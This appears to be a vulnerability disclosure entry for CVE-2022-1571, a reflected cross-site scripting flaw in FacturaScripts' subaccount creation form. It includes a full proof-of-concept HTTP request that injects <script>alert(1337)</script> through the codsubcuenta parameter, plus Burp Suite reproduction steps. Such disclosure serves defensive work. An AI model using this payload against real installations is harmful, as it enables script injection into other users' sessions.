Lucene search
Nhienit20104578A690-73E5-4313-840C-EE15E5329741HistoryApr 30, 2022 - 10:26 a.m.
Cross-site scripting - Reflected in Create Subaccount
2022-04-3010:26:16
nhienit2010
www.huntr.dev
14
cross-site scripting
reflected
create subaccount
`codsubcuenta` parameter
burp suite
xss payload
accounting section
EPSS
0.001
Percentile
30.0%
Description
Cross-site scripting - Reflected in Create Subaccount via codsubcuenta parameter.
Proof of Concept
POST /facturascripts/EditSubcuenta HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------363416527826407339693188325960
Content-Length: 1558
Origin: http://localhost
Connection: close
Referer: http://localhost/facturascripts/EditSubcuenta
Cookie: fsNick=admin; fsLogkey=6pCG4IKxZ8oOUTkeVg5siaMfyR2q37Bb9JhYvAPlXH1rLWdcmFSNun0wjzQtED; fsLang=en_EN; fsCompany=1; lhc_vid=0155fb94b7b38957dfc4; lhc_rm_u=GW6CXYX9Kvs3laO9i4fjnR7ruXW44H%3A1%3A87494d3c0efceb6d8d9974ea5e6c9f11881b9ee0; organizrLanguage=en; csrf-token-data=%7B%22value%22%3A%22jzfiNNFxYEXZET6aCcebWmglZOg2JPA9SsDylMUM%22%2C%22expiry%22%3A1651160325308%7D; lang=en_US;
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="action"
insert
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="activetab"
EditSubcuenta
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="code"
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="multireqtoken"
99a8c7a2305b11e06fbd8bc0c9446f0826e73bdd|5yqptN
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codsubcuenta"
<script>alert(1337)</script>
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="descripcion"
123123
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codejercicio"
2022
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="idcuenta"
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codcuentaesp"
CLIENT
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="debe"
0
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="haber"
0
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="saldo"
0
-----------------------------363416527826407339693188325960--
Step to reproduce
- In
Accountingsection, chooseNewand fill all form with anything value
- Use
Burp suiteintercept this request and modifycodsubcuentaparameter value withXSS payloadand clickForward
- And
alert(1337)execute
Related
osv
osv
CVE-2022-1571
2022-05-04 11:15:08
Cross-site Scripting in FacturaScripts
2022-05-05 00:00:26
nvd
nvd
CVE-2022-1571
2022-05-04 11:15:08
prion
prion
Cross site scripting
2022-05-04 11:15:00
veracode
veracode
Cross-site Scripting (XSS)
2022-05-05 11:47:09
cvelist
cvelist
cve
cve
CVE-2022-1571
2022-05-04 11:15:08
github
github
Cross-site Scripting in FacturaScripts
2022-05-05 00:00:26
cnvd
cnvd
FacturaScripts Cross-Site Scripting Vulnerability (CNVD-2022-76230)
2022-05-09 00:00:00